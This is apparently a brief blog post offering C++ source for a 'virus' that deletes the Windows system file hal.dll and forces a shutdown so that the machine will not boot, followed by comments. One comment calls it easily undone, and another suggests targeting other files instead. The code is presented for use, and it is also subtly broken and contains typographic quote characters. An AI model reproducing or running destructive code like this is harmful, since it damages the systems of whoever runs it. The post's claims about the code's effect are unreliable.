The following is the source code of the Virus that would curropt the windows and shutdown. But the Windows will never start up again.
#include <iostream.h>
#include <windows.h>
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”);
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}
Hey man, this is the old Hal.dll delete thing. But, this can easily be restored in systems menus :P
ReplyDeletethis is just an example you can replace hal.dll with anything else.
ReplyDelete